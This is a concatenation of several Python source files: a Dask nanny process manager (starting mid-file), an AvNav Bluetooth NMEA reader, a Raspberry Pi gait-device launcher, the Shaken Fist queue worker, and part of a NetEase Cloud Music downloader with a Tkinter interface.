self.worker_address = None
async def start(self):
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
return
msg = await self._wait_until_connected(uid)
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = "running"
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
delay = 0.05
while True:
if self.status != Status.starting:
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(delay)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
await self.process.join()
raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
|
bluetoothhandler.py
|
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2021 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# parts from this software (AIS decoding) are taken from the gpsd project
# so refer to this BSD licencse also (see ais.py) or omit ais.py
###############################################################################
hasBluetooth=False
try:
import bluetooth
hasBluetooth=True
except:
pass
from socketreaderbase import *
import avnav_handlerList
if hasBluetooth:
class OurBtSocket(bluetooth.BluetoothSocket):
def __init__(self, proto=bluetooth.RFCOMM, _sock=None):
super().__init__(proto, _sock)
self._closed=False
def connect(self, addrport):
rt=super().connect(addrport)
if self._closed:
raise Exception("socket closed")
return rt
def send(self, data):
if self._closed:
raise Exception("socket closed")
return super().send(data)
def recv(self, numbytes):
if self._closed:
raise Exception("socket closed")
try:
return super().recv(numbytes)
except Exception as e:
if isinstance(e,bluetooth.btcommon.BluetoothError):
if re.match("timed* *out",str(e)):
raise socket.timeout()
AVNLog.info("bluetooth socket error: ",str(e))
raise
def close(self):
self._closed=True
return super().close()
else:
class OurBtSocket:
pass
#a Worker for reading bluetooth devices
#it uses a feeder to handle the received data
class AVNBlueToothReader(AVNWorker,SocketReader):
@classmethod
def getConfigName(cls):
return "AVNBlueToothReader"
@classmethod
def getConfigParam(cls, child=None):
rt=[
WorkerParameter('maxDevices',5,description="maximal number of bluetooth devices",type=WorkerParameter.T_NUMBER),
WorkerParameter('deviceList','',description=", separated list of devices addresses. If set - only connect to those devices"),
WorkerParameter('feederName','',editable=False,description="if set, use this feeder"),
WorkerParameter('filter','',type=WorkerParameter.T_FILTER)
]
return rt
@classmethod
def createInstance(cls, cfgparam):
if not hasBluetooth:
raise Exception("no bluetooth installed, cannot run %s"%(cls.getConfigName()))
return AVNBlueToothReader(cfgparam)
@classmethod
def canEdit(cls):
return True
@classmethod
def canDisable(cls):
return True
def _closeSockets(self):
for host,sock in list(self.addrmap.items()):
try:
sock.close()
except Exception as e:
AVNLog.error("error closing bt socket %s: %s ",host,str(e))
def updateConfig(self, param, child=None):
super().updateConfig(param, child)
self._closeSockets()
def stop(self):
super().stop()
self._closeSockets()
def __init__(self,cfgparam):
AVNWorker.__init__(self, cfgparam)
self.maplock=threading.Lock()
self.addrmap={}
#return True if added
def checkAndAddAddr(self,addr,socket):
rt=False
maxd=self.getIntParam('maxDevices')
self.maplock.acquire()
if len(self.addrmap) < maxd:
if not addr in self.addrmap:
self.addrmap[addr]=socket
rt=True
self.maplock.release()
return rt
def removeAddr(self,addr):
self.maplock.acquire()
try:
self.addrmap.pop(addr)
except:
pass
self.maplock.release()
#a thread to open a bluetooth socket and read from it until
#disconnected
def readBT(self,host,port):
infoName="BTReader-%s"%(host)
threading.current_thread().setName("%s-reader-%s]"%(self.getName(),host))
try:
sock=OurBtSocket( bluetooth.RFCOMM )
if not self.checkAndAddAddr(host,sock):
try:
sock.close()
except:
pass
return
AVNLog.debug("started bluetooth reader thread for %s:%s",str(host),str(port))
self.setInfo(infoName, "connecting", WorkerStatus.STARTED)
sock.connect((host, port))
AVNLog.info("bluetooth connection to %s established",host)
self.readSocket(sock,infoName,self.getSourceName(host),self.getParamValue('filter'))
sock.close()
except Exception as e:
AVNLog.debug("exception from bluetooth device: %s",traceback.format_exc())
try:
sock.close()
except:
pass
AVNLog.info("disconnected from bluetooth device ")
self.setInfo(infoName, "disconnected", WorkerStatus.INACTIVE)
self.removeAddr(host)
self.deleteInfo(infoName)
#this is the main thread - this executes the bluetooth polling
def run(self):
self.wait(2) # give a chance to have the socket open...
#now start an endless loop with BT discovery...
self.setInfo('main', "discovering", WorkerStatus.RUNNING)
while not self.shouldStop():
service_matches=[]
try:
AVNLog.debug("starting BT discovery")
service_matches = bluetooth.find_service(uuid = bluetooth.SERIAL_PORT_CLASS)
except Exception as e:
AVNLog.warn("exception when querying BT services %s, retrying after 10s",traceback.format_exc())
if self.shouldStop():
return
if len(service_matches) == 0:
self.wait(10)
continue
AVNLog.ld("found bluetooth devices",service_matches)
filter=[]
filterstr=self.getStringParam('devicelist')
if not filterstr is None and not filterstr=='':
filter=filterstr.split(',')
for match in service_matches:
port = match["port"]
name = match["name"]
host = match["host"]
found=False
if len(filter) > 0:
if host in filter:
found=True
else:
AVNLog.debug("ignoring device %s as it is not in the list #%s#",host,filterstr)
else:
found=True
if found:
try:
AVNLog.info("found new bluetooth device %s",host)
handler=threading.Thread(target=self.readBT,args=(host,port))
handler.daemon=True
handler.start()
except Exception as e:
AVNLog.warn("unable to start BT handler %s",traceback.format_exc())
self.removeAddr(host)
self.wait(10)
avnav_handlerList.registerHandler(AVNBlueToothReader)
|
Main.py
|
from Gaitmate import Gaitmate
from HaqPi.Component.JuiceBoxListener import JuiceBoxListener
import resetGPIO
from multiprocessing import Process, Pipe
import time
from InitSettings import InitSettings as settings
import dataCollector
# PINOUT
#
# Buzzer: PIN 11 BCM 17
# Buzzer2: PIN 36 BCM 16
# Haptic: PIN 13 BCM 27
# LED: PIN 22 BCM 25
# Button: PIN 31 BCM 6
# Laser: PIN 29 BCM 5
# JBox: PIN 37 BCM 26
##
def main():
controller = Gaitmate(0x68, 17, 27, 6, 5, 25)
jBoxListener = JuiceBoxListener(settings.juiceBoxPin, controller)
recv_end, send_end = Pipe(False)
p1 = Process(target=controller.ledAction().breathe,
args=(settings.startupDuration+1, 0.05))
p1.start()
def buttonListener(send_end):
timerEnd = time.time() + settings.startupDuration
while (time.time() < timerEnd):
time.sleep(0.1)
if (controller.buttonAction().isPressed()):
send_end.send(True)
return
send_end.send(False)
buttonListener(send_end)
if (recv_end.recv()):
p1.terminate()
controller.buzzerAction().metronome(0.1, 0.3, 0.05)
dataCollector.execute()
else:
controller.execute()
main()
|
queues.py
|
import copy
import multiprocessing
import re
import requests
import setproctitle
import time
from shakenfist import config
from shakenfist.daemons import daemon
from shakenfist import db
from shakenfist import exceptions
from shakenfist.images import Image
from shakenfist import logutil
from shakenfist import net
from shakenfist import scheduler
from shakenfist import util
from shakenfist import virt
from shakenfist.tasks import (QueueTask,
DeleteInstanceTask,
ErrorInstanceTask,
FetchImageTask,
InstanceTask,
PreflightInstanceTask,
StartInstanceTask,
)
LOG, _ = logutil.setup(__name__)
def handle(jobname, workitem):
log = LOG.withField('workitem', jobname)
log.info('Processing workitem')
setproctitle.setproctitle(
'%s-%s' % (daemon.process_name('queues'), jobname))
instance_uuid = None
task = None
try:
for task in workitem.get('tasks', []):
if not QueueTask.__subclasscheck__(type(task)):
raise exceptions.UnknownTaskException(
'Task was not decoded: %s' % task)
if (InstanceTask.__subclasscheck__(type(task)) or
isinstance(task, FetchImageTask)):
instance_uuid = task.instance_uuid()
if instance_uuid:
log_i = log.withInstance(instance_uuid)
else:
log_i = log
log_i.withField('task_name', task.name()).info('Starting task')
# TODO(andy) Should network events also come through here eventually?
# Then this can be generalised to record events on networks/instances
# TODO(andy) This event should be recorded when it is recorded as
# dequeued in the DB. Currently it's reporting action on the item
# and calling it 'dequeue'.
if instance_uuid:
# TODO(andy) move to QueueTask
db.add_event('instance', instance_uuid, task.pretty_task_name(),
'dequeued', None, 'Work item %s' % jobname)
if isinstance(task, FetchImageTask):
image_fetch(task.url(), instance_uuid)
elif isinstance(task, PreflightInstanceTask):
redirect_to = instance_preflight(instance_uuid, task.network())
if redirect_to:
log_i.info('Redirecting instance start to %s'
% redirect_to)
db.place_instance(instance_uuid, redirect_to)
db.enqueue(redirect_to, workitem)
return
elif isinstance(task, StartInstanceTask):
instance_start(instance_uuid, task.network())
db.update_instance_state(instance_uuid, 'created')
db.enqueue('%s-metrics' % config.parsed.get('NODE_NAME'), {})
elif isinstance(task, DeleteInstanceTask):
try:
instance_delete(instance_uuid)
db.update_instance_state(instance_uuid, 'deleted')
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
elif isinstance(task, ErrorInstanceTask):
try:
instance_delete(instance_uuid)
db.update_instance_state(instance_uuid, 'error')
if task.error_msg():
db.update_instance_error_message(
instance_uuid, task.error_msg())
db.enqueue('%s-metrics' %
config.parsed.get('NODE_NAME'), {})
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
else:
log_i.withField('task', task).error('Unhandled task - dropped')
log_i.info('Task complete')
except exceptions.ImageFetchTaskFailedException as e:
# Usually caused by external issue and not an application error
log.info('Fetch Image Error: %s', e)
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'failed queue task: %s' % e)
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'failed queue task: %s' % e)
finally:
db.resolve(config.parsed.get('NODE_NAME'), jobname)
if instance_uuid:
db.add_event('instance', instance_uuid, 'tasks complete',
'dequeued', None, 'Work item %s' % jobname)
log.info('Completed workitem')
def image_fetch(url, instance_uuid):
instance = None
if instance_uuid:
instance = virt.from_db(instance_uuid)
try:
# TODO(andy): Wait up to 15 mins for another queue process to download
# the required image. This will be changed to queue on a
# "waiting_image_fetch" queue but this works now.
with db.get_lock('image', config.parsed.get('NODE_NAME'),
Image.calc_unique_ref(url), timeout=15*60,
op='Image fetch') as lock:
img = Image.from_url(url)
img.get([lock], instance)
db.add_event('image', url, 'fetch', None, None, 'success')
except (exceptions.HTTPError, requests.exceptions.RequestException) as e:
LOG.withField('image', url).warning('Failed to fetch image')
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'Image fetch failed: %s' % e)
# Clean common problems to store in events
msg = str(e)
re_conn_err = re.compile(r'.*NewConnectionError\(\'\<.*\>: (.*)\'')
m = re_conn_err.match(msg)
if m:
msg = m.group(1)
db.add_event('image', url, 'fetch', None, None, 'Error: '+msg)
raise exceptions.ImageFetchTaskFailedException(
'Failed to fetch image %s' % url)
def instance_preflight(instance_uuid, network):
db.update_instance_state(instance_uuid, 'preflight')
s = scheduler.Scheduler()
instance = virt.from_db(instance_uuid)
try:
s.place_instance(
instance, network, candidates=[config.parsed.get('NODE_NAME')])
return None
except exceptions.LowResourceException as e:
db.add_event('instance', instance_uuid,
'schedule', 'retry', None,
'insufficient resources: ' + str(e))
if instance.db_entry.get('placement_attempts') > 3:
raise exceptions.AbortInstanceStartException(
'Too many start attempts')
try:
if instance.db_entry.get('requested_placement'):
candidates = [instance.db_entry.get('requested_placement')]
else:
candidates = []
for node in s.metrics.keys():
if node != config.parsed.get('NODE_NAME'):
candidates.append(node)
candidates = s.place_instance(instance, network,
candidates=candidates)
return candidates[0]
except exceptions.LowResourceException as e:
db.add_event('instance', instance_uuid,
'schedule', 'failed', None,
'insufficient resources: ' + str(e))
# This raise implies delete above
raise exceptions.AbortInstanceStartException(
'Unable to find suitable node')
def instance_start(instance_uuid, network):
with db.get_lock(
'instance', None, instance_uuid, ttl=900, timeout=120,
op='Instance start') as lock:
instance = virt.from_db(instance_uuid)
# Collect the networks
nets = {}
for netdesc in network:
if netdesc['network_uuid'] not in nets:
n = net.from_db(netdesc['network_uuid'])
if not n:
db.enqueue_instance_error(instance_uuid, 'missing network')
return
nets[netdesc['network_uuid']] = n
# Create the networks
with util.RecordedOperation('ensure networks exist', instance):
for network_uuid in nets:
n = nets[network_uuid]
n.create()
n.ensure_mesh()
n.update_dhcp()
# Now we can start the instance
libvirt = util.get_libvirt()
try:
with util.RecordedOperation('instance creation',
instance):
instance.create(lock=lock)
except libvirt.libvirtError as e:
code = e.get_error_code()
if code in (libvirt.VIR_ERR_CONFIG_UNSUPPORTED,
libvirt.VIR_ERR_XML_ERROR):
db.enqueue_instance_error(instance_uuid,
'instance failed to start: %s' % e)
return
for iface in db.get_instance_interfaces(instance_uuid):
db.update_network_interface_state(iface['uuid'], 'created')
def instance_delete(instance_uuid):
with db.get_lock('instance', None, instance_uuid, timeout=120,
op='Instance delete'):
db.add_event('instance', instance_uuid,
'queued', 'delete', None, None)
# Create list of networks used by instance
instance_networks = []
for iface in list(db.get_instance_interfaces(instance_uuid)):
if not iface['network_uuid'] in instance_networks:
instance_networks.append(iface['network_uuid'])
# Create list of networks used by all other instances
host_networks = []
for inst in list(
db.get_instances(only_node=config.parsed.get('NODE_NAME'))):
if not inst['uuid'] == instance_uuid:
for iface in db.get_instance_interfaces(inst['uuid']):
if not iface['network_uuid'] in host_networks:
host_networks.append(iface['network_uuid'])
instance_from_db_virt = virt.from_db(instance_uuid)
if instance_from_db_virt:
instance_from_db_virt.delete()
# Check each network used by the deleted instance
for network in instance_networks:
n = net.from_db(network)
if n:
# If network used by another instance, only update
if network in host_networks:
with util.RecordedOperation('deallocate ip address',
instance_from_db_virt):
n.update_dhcp()
else:
# Network not used by any other instance therefore delete
with util.RecordedOperation('remove network', n):
n.delete()
class Monitor(daemon.Daemon):
def run(self):
workers = []
LOG.info('Starting Queues')
libvirt = util.get_libvirt()
conn = libvirt.open(None)
present_cpus, _, _ = conn.getCPUMap()
while True:
try:
for w in copy.copy(workers):
if not w.is_alive():
w.join(1)
workers.remove(w)
if len(workers) < present_cpus / 2:
jobname, workitem = db.dequeue(
config.parsed.get('NODE_NAME'))
else:
workitem = None
if not workitem:
time.sleep(0.2)
continue
p = multiprocessing.Process(
target=handle, args=(jobname, workitem,),
name='%s-worker' % daemon.process_name('queues'))
p.start()
workers.append(p)
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
|
NetEaseMusicUI.pyw
|
#! /usr/bin/env python3
# -*- coding:utf-8 -*-
# @author: AnarL. (anar930906@gmail.com)
# @Modified by robonxt (on github)
# @environment: Python3 with requests + unicodedata
# @description: 使用本程序可以轻松下载网易云音乐的歌曲,只需要有歌曲的网页即可,单独付费歌曲无法下载。
# 本程序仅供学习交流使用,严禁用于任何商业用途,产生任何法律纠纷与作者无关。
# 请尊重版权,树立版权意识。
# @README: 添加封面需要使用lame库,如果电脑中没有,请使用brew install lame或其他方式安装。暂时不支持在windows上运行
# @license: MIT
# Pyinstaller error
# solution: https://stackoverflow.com/questions/48876156/pyinstaller-fails-to-import-site-module-in-python3-on-macosx
from tkinter import filedialog
from tkinter import LEFT
from tkinter import ttk
from tkinter import scrolledtext
from enum import Enum
import threading
import tkinter as tk
import re
import requests
import json
import re
import os
import subprocess
import sys
import time
import unicodedata # New!
import locale
from config import http_error
from config import music_genre
from Crypto.Cipher import AES
import base64
url_type = Enum(
"url_type",
("url_type_playlist", "url_type_album", "url_type_mv", "url_type_single"),
)
__DATE__ = "2021-02-10"
__VERSION__ = "v1.2"
__AUTHOR__ = "AnarL. (anar930906@gmail.com)"
__AUTHOR_MODDER__ = "robonxt (on github)"
__TRANSLATIONS__ = "ignaciocastro, robonxt"
URL_TYPE_KEY = "url_type"
URL_TYPE_SINGLE = "single"
URL_TYPE_LIST = "playlist"
URL_TYPE_VIDEO = "video"
LIST_RANGE_KEY = "list_range"
ADD_TO_ITUNES_KEY = "add_to_itunes"
global FOLDER_PATH_KEY
FOLDER_PATH_KEY = os.path.expanduser("~\\NetEaseMusic Downloads\\")
global URL_KEY
URL_KEY = "url"
# This is the string for the User Agent. Seems to work well
# New!
GLOBAL_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
messages_queue = []
def get_genre_code(genre):
if genre in music_genre.keys():
return music_genre[genre]
return 13
def get_params(text):
first_key = "0CoJUm6Qyw8W8jud".encode("utf-8")
second_key = "FFFFFFFFFFFFFFFF".encode("utf-8")
h_encText = AES_encrypt(text, first_key)
h_encText = AES_encrypt(h_encText, second_key)
return h_encText
def get_encSecKey():
encSecKey = (
"257348aecb5e556c066de214e5"
"31faadd1c55d814f9be95fd06d6bf"
"f9f4c7a41f831f6394d5a3fd2e388"
"1736d94a02ca919d952872e7d0a50e"
"bfa1769a7a62d512f5f1ca21aec60b"
"c3819a9c3ffca5eca9a0dba6d6f7249"
"b06f5965ecfff3695b54e1c28f3f624"
"750ed39e7de08fc8493242e26dbc4484a01c76f739e135637c"
)
return encSecKey
def AES_encrypt(text, key):
iv = "0102030405060708".encode("utf-8")
pad = 16 - len(text) % 16
text = (text + pad * chr(pad)).encode("utf-8")
encryptor = AES.new(key, AES.MODE_CBC, iv=iv)
encrypt_text = encryptor.encrypt(text)
encrypt_text = base64.b64encode(encrypt_text)
encrypt_text = str(encrypt_text, encoding="utf-8")
return encrypt_text
def get_response(url):
ua = GLOBAL_UA
res = requests.get(url, headers={"User-Agent": ua})
if res.status_code != 200:
messages_queue.append(f"Network Error: {http_error[res.status_code]}")
messages_queue.append(url)
return json.loads(res.text)
def extract_id(input_url):
messages_queue.append("Matching ID...")
match = re.search(r"id=\d{2,12}", input_url)
if match:
messages_queue.append(f"Obtain ID: {match.group(0)[3:]}")
return match.group(0)[3:]
return None
def get_song_name_album_poster(type_id):
api = "http://music.163.com/api/song/detail?ids=[{}]".format(type_id)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Failed to get song details!")
return None
song_obj = json_obj["songs"][0]
song_name = song_obj["name"]
artists = song_obj["artists"]
singers = []
for ar in artists:
singers.append(ar["name"])
album_obj = None
if "al" in song_obj.keys():
album_obj = song_obj["al"]
elif "album" in song_obj.keys():
album_obj = song_obj["album"]
album = album_obj["name"]
year = year_of_timestamp(album_obj["publishTime"] / 1000)
track = song_obj["no"]
poster = album_obj["picUrl"]
br = get_music_best_bitrate(song_obj)
obj = Music(song_name, singers, album, year, track, poster, br)
return obj
def get_music_best_bitrate(song_obj):
br = 96000
if "hMusic" in song_obj and song_obj["hMusic"] is not None:
br = song_obj["hMusic"]["bitrate"]
elif "mMusic" in song_obj and song_obj["mMusic"] is not None:
br = song_obj["mMusic"]["bitrate"]
elif "lMusic" in song_obj and song_obj["lMusic"] is not None:
br = song_obj["lMusic"]["bitrate"]
elif "bMusic" in song_obj and song_obj["bMusic"] is not None:
br = song_obj["bMusic"]["bitrate"]
return br
def get_max_size(size_keys):
max_size = 0
for key in size_keys:
if int(key) > max_size:
max_size = int(key)
return str(max_size)
def get_mv_info(type_id):
api = "https://api.imjad.cn/cloudmusic/?type=mv&id={}".format(type_id)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Failed to get MV details!")
return None
mv_info = json_obj["data"]
size_keys = mv_info["brs"].keys()
default_mv_url = mv_info["brs"][get_max_size(size_keys)]
mv_name = mv_info["name"]
return (default_mv_url, mv_name)
def get_music_url_with_official_api(type_id, br):
# This section is for test official encryption.
messages_queue.append("Downloading song from official API...")
first_param = '{ids:"[%s]", br:"%s", csrf_token:""}' % (type_id, br)
data = {
"params": get_params(first_param).encode("utf-8"),
"encSecKey": get_encSecKey(),
}
ua = GLOBAL_UA
he = {
"Referer": "http://music.163.com",
"Host": "music.163.com",
"User-Agent": ua,
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
}
res = None
try:
url = "http://music.163.com/weapi/song/enhance/player/url?csrf_token="
res = requests.post(url, headers=he, data=data)
except Exception as e:
messages_queue.append(e)
#
d = json.loads(res.text)
if d["code"] == 200:
return d["data"][0]["url"]
return None
def get_music_url_with_3rd_party_api(type_id, br):
messages_queue.append("Downloading song from 3rd party API...")
api = "https://api.imjad.cn/cloudmusic?type=song&id={}&br={}".format(type_id, br)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Response Error")
return None
return json_obj["data"][0]["url"]
def get_playlist_songs(type_id, folder="", range=""):
api = "http://music.163.com/api/playlist/detail?id={}".format(type_id)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Response Error")
return
tracks = extract_playlist_ids(json_obj["result"]["tracks"])
# messages_queue.append(tracks)
idx = 1
total = len(tracks)
if len(range) == 0:
for track in tracks:
messages_queue.append(
"! Downloading songs from playlist ({}/{}) !".format(idx, total)
)
url = "http://music.163.com/#/song?id={}".format(track)
download_music(url, folder=folder)
time.sleep(1)
idx += 1
else:
for index in string_to_list(range):
track = tracks[index - 1]
messages_queue.append(
"! Downloading songs from range ({}/{}) !".format(index, len(tracks))
)
url = "http://music.163.com/#/song?id={}".format(track)
download_music(url, folder=folder)
time.sleep(1)
def get_album_songs(type_id, folder=""):
api = "https://api.imjad.cn/cloudmusic/?type=album&id={}".format(type_id)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Response Error")
return
tracks = extract_playlist_ids(json_obj["songs"])
album_name = json_obj["album"]["name"]
idx = 1
total = len(tracks)
for track in tracks:
messages_queue.append(
"! Downloading songs from album 【{}】 ({}/{}) !".format(
album_name, idx, total
)
)
url = "http://music.163.com/#/song?id={}".format(track)
download_music(url, folder)
time.sleep(1)
idx += 1
def extract_playlist_ids(tracks_json):
ret_tracks = []
for track in tracks_json:
ret_tracks.append(track["id"])
return ret_tracks
def download_playlist(url, folder="", range=""):
type_id = extract_id(url)
messages_queue.append("Start parsing song list info...")
get_playlist_songs(type_id, folder=folder, range=range)
def download_album(url, folder=""):
type_id = extract_id(url)
messages_queue.append("Start parsing album info...")
get_album_songs(type_id, folder=folder)
def download_mv(url, folder=""):
# pattern = https://music.163.com/#/mv?id={}
messages_queue.append("Downloading MV...")
type_id = extract_id(url)
if not type_id:
messages_queue.append("❌ :Parsing of MV ID failed")
return
(mv_url, mv_name) = get_mv_info(type_id)
download_file(mv_url, folder=folder, export_file_name=mv_name)
def download_music(url, folder=""):
# pattern = http://music.163.com/#/song?id={}
if len(folder) > 0 and not os.path.exists(folder):
os.mkdir(folder)
type_id = extract_id(url)
if not type_id:
messages_queue.append("❌ :Parsing of song or playlist ID failed")
return
music_obj = get_song_name_album_poster(type_id)
if not music_obj.title:
return
#
#
# Testing!
global music_file_safe
music_file_safe = slugify(music_obj.title, True)
#
#
#
messages_queue.append("Downloading music:")
url = get_music_url_with_official_api(type_id, music_obj.br)
if url is None:
url = get_music_url_with_3rd_party_api(type_id, music_obj.br)
# Original:
# audio = download_file(url, folder=folder, export_file_name=music_obj.title)
#
# messages_queue.append('audio = ...'))
audio = download_file(url, folder=folder, export_file_name=music_file_safe)
# messages_queue.append('OK'))
if not audio:
audio = try_get_file_in_qq_music(music_obj.title, music_obj.artists)
if not audio:
return
messages_queue.append("Downloading Coverart:")
#
#
#
# poster = download_file(music_obj.poster, folder=folder, export_file_name=music_obj.title)
poster = download_file(
music_obj.poster, folder=folder, export_file_name=music_file_safe
)
#
#
#
messages_queue.append("Adding Coverart:")
audio_name = ""
if hasattr(audio, "name"):
audio_name = audio.name
else:
audio_name = audio
#
#
# Testing!
# Original:
# messages_queue.append('Before add_poster'))
add_poster(
poster.name,
music_obj.title,
music_obj.artists,
music_obj.album,
music_obj.year,
music_obj.track,
audio_name,
music_obj.br,
)
# messages_queue.append('OK'))
QQ_music_search_tip_api = (
"https://c.y.qq.com/soso/fcgi-bin"
"/client_search_cp?ct=24&qqmusic_ver=1298"
"&new_json=1&remoteplace=txt.yqq.song"
"&searchid=56069080114511262&t=0"
"&aggr=1&cr=1&catZhida=1&lossless=0"
"&flag_qc=0&p={page}&n=20&w={song_name}"
"&g_tk=5381&loginUin=0&hostUin=0"
"&format=json&inCharset=utf-8"
"&outCharset=utf-8¬ice=0&platform=yqq&needNewCode=0"
)
QQ_music_song_info_api = (
"https://c.y.qq.com/base/fcgi-bin/fcg_music_express_mobile3.fcg"
"?g_tk=63395543&hostUin=0&format=json&inCharset=utf-8"
"&outCharset=utf-8¬ice=0&platform=yqq&needNewCode=0"
"&cid=205361747&songmid={song_id}"
"&filename=C400{song_id}.m4a&guid=9362313912"
)
QQ_music_song_dl_api = (
"http://dl.stream.qqmusic.qq.com"
"/{file_name}?vkey={v_key}&guid=9362313912"
"&uin=0&fromtag=66"
)
def search_qq_music(music_name, singer):
messages_queue.append("Searching on QQ Music...")
url = QQ_music_search_tip_api.format(page=1, song_name=music_name)
json_obj = get_response(url)
songs = json_obj["data"]["song"]["list"]
target_id = ""
for item in songs:
item_singer = item["singer"][0]["name"]
if item_singer == singer:
target_id = item["mid"]
break
return target_id
def get_qq_music_dl_info(mid):
url = QQ_music_song_info_api.format(song_id=mid)
json_obj = get_response(url)
